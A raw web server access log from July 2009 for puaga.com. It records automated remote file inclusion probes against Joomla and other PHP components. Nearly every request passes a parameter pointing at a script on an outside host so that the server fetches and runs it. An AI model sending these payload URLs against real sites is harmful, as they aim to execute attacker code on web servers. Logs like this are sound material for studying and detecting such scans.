70.87.217.26 - - [05/Jul/2009:06:22:36 -0700] "GET /logs/access_090609.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:23:23 -0700] "GET /logs/access_090531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:23:39 -0700] "GET /logs/access_090526.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:23:47 -0700] "GET /logs/access_090615.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:23:48 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:23:50 -0700] "GET /logs/access_090609.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:23:55 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:24:33 -0700] "GET /logs/access_090531.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:06:24:43 -0700] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.0" 200 6109 "-" "libwww-perl/5.805" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:24:44 -0700] "GET /logs/access_090526.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:06:25:06 -0700] "GET /logs/access_090523.log//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:06:25:06 -0700] "GET /logs/access_090523.log//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:25:06 -0700] "GET /logs/access_090523.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
213.171.225.234 - - [05/Jul/2009:06:25:08 -0700] "GET /index.php?theme=http://fd.axl-jp.net//assets/export/v6-i.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
213.171.225.234 - - [05/Jul/2009:06:25:08 -0700] "GET /logs/access_090619.log//index.php?theme=http://fd.axl-jp.net//assets/export/v6-i.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.171.225.234 - - [05/Jul/2009:06:25:08 -0700] "GET /logs//index.php?theme=http://fd.axl-jp.net//assets/export/v6-i.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:06:25:45 -0700] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.811" "www.puaga.com"
77.221.130.22 - - [05/Jul/2009:06:26:03 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.221.130.22 - - [05/Jul/2009:06:26:03 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.221.130.22 - - [05/Jul/2009:06:26:03 -0700] "GET /logs/access_090524.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.221.130.22 - - [05/Jul/2009:06:26:19 -0700] "GET /logs/access_090523.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:26:46 -0700] "GET /config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:26:46 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:26:46 -0700] "GET /logs/access_090522.log/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:26:56 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:26:57 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:27:01 -0700] "GET /logs/access_090609.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:27:01 -0700] "GET /logs/access_090615.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:06:27:04 -0700] "GET /logs/access_090510.log//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:06:27:05 -0700] "GET /logs//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:06:27:05 -0700] "GET /?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:06:27:13 -0700] "GET /logs/access_090510.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:06:27:13 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:06:27:13 -0700] "GET /logs/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:27:14 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:27:16 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:27:19 -0700] "GET /logs/access_090609.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:27:19 -0700] "GET /logs/access_090615.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:27:26 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:27:26 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:27:27 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:27:32 -0700] "GET /logs/access_090616.log/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
212.158.167.98 - - [05/Jul/2009:06:29:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fd.axl-jp.net//assets/export/_MD.TXT??? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.puaga.com"
212.158.167.98 - - [05/Jul/2009:06:29:20 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fd.axl-jp.net//assets/export/_MD.TXT??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:06:29:48 -0700] "GET /logs/access_090510.log%20%20//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:06:30:03 -0700] "GET /logs/access_090514.log%20%20//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:32:17 -0700] "GET /logs/access_090615.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:32:22 -0700] "GET /logs/access_090609.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:06:36:28 -0700] "GET /logs/access_090514.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:37:50 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:37:54 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:37:54 -0700] "GET /logs/access_090609.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:37:57 -0700] "GET /logs/access_090615.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:37:57 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:37:58 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:37:58 -0700] "GET /logs/access_090609.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:37:59 -0700] "GET /logs/access_090609.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:37:59 -0700] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:01 -0700] "GET /logs/access_090614.log/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:01 -0700] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:34 -0700] "GET /logs/access_090621.log/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:36 -0700] "GET /logs/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:36 -0700] "GET /atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:36 -0700] "GET /logs/access_090530.log/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:44 -0700] "GET /logs/access_090610.log/tracking/userLog.php?rootSys=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:47 -0700] "GET /logs/tracking/userLog.php?rootSys=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:38:47 -0700] "GET /tracking/userLog.php?rootSys=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:38:48 -0700] "GET /logs/access_090628.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.12.194.128 - - [05/Jul/2009:06:39:01 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.12.194.128 - - [05/Jul/2009:06:39:01 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.12.194.128 - - [05/Jul/2009:06:39:01 -0700] "GET /logs/access_090611.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:39:04 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:39:04 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:39:04 -0700] "GET /logs/access_090623.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:39:10 -0700] "GET /logs/access_090619.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.181.182 - - [05/Jul/2009:06:39:13 -0700] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "puaga.com"
94.229.66.202 - - [05/Jul/2009:06:40:04 -0700] "GET /logs/access_090601.log/tracking/userLog.php?rootSys=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
202.160.184.18 - - [05/Jul/2009:06:40:27 -0700] "GET /orange_g/forum/viewtopic.php?p=6594 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "puaga.com"
79.12.194.128 - - [05/Jul/2009:06:40:44 -0700] "GET /logs/access_090603.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:41:12 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:41:19 -0700] "GET /logs/access_090609.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:41:19 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.186.1.54 - - [05/Jul/2009:06:41:21 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.800" "www.puaga.com"
89.186.1.54 - - [05/Jul/2009:06:41:22 -0700] "GET /logs/access_090520.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.800" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:41:22 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:41:22 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:41:22 -0700] "GET /logs/access_090609.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.186.1.54 - - [05/Jul/2009:06:41:22 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.800" "www.puaga.com"
89.186.1.54 - - [05/Jul/2009:06:41:46 -0700] "GET /logs/access_090523.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.800" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:41:50 -0700] "GET /logs/access_090628.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:42:04 -0700] "GET /logs/access_090520.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:42:04 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:42:04 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:42:04 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:42:04 -0700] "GET /logs/access_090609.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:42:04 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:42:05 -0700] "GET /logs/access_090525.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:06:42:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:42:10 -0700] "GET /logs/access_090609.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:42:10 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:42:10 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:42:26 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:42:29 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:42:29 -0700] "GET /logs/access_090612.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:42:34 -0700] "GET /logs/access_090628.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:42:53 -0700] "GET /logs/access_090523.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:43:00 -0700] "GET /logs/access_090623.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:43:00 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:43:01 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:06:43:01 -0700] "GET /logs/access_090624.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:43:59 -0700] "GET /logs/access_090623.log%20/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
